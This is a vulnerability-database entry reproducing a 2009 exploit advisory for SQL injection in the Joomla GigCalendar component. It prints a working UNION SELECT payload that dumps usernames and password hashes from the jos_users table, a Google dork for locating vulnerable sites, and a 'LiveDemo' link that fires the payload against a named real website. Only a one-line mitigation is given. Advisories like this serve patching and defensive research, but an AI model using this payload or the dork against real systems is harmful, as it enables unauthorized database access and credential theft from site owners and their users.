Joomla Component com_gigcal(gigcal_gigs_id) SQL-injection

vendor:

GigCalendar

by:

boom3rang

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: GigCalendar

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:gigcalendar:gigcalendar:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_gigcal(gigcal_gigs_id) SQL-injection

An SQL injection vulnerability exists in the Joomla Component com_gigcal(gigcal_gigs_id). An attacker can exploit this vulnerability to gain access to sensitive information from the database. The vulnerable parameter is 'gigcal_gigs_id' which can be exploited with the following payload: '+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#############################################################
Joomla Component com_gigcal(gigcal_gigs_id) SQL-injection
#############################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability :  SQL injection 
#[~] Google Dork   :  inurl:com_gigcal
--------------------------------------------------
#[!] Name          :  GigCalendar
#[!] creationDate  :  Dec 2005 
#[!] Created by    :  Graham Spice, David Richards 
#[!] AuthorEmail   :  capt@gigcalendar.net 
#[!] Site          :  www.gigcalendar.net
#[!] Version       :  1.0
#[!] Download      :  http://joomlacode.org/gf/project/gigcalendar/frs/?action=FrsReleaseBrowse&frs_package_id=214
###################################################


[-] Example:
http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id=[Exploit]


[-] Exploit:
'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*


[-] LiveDemo: 
http://dromnyc.com/home/index.php?option=com_gigcal&task=details&gigcal_gigs_id=402'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*&Itemid=37


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
#[!] Free Palestine
##############################

# milw0rm.com [2009-01-13]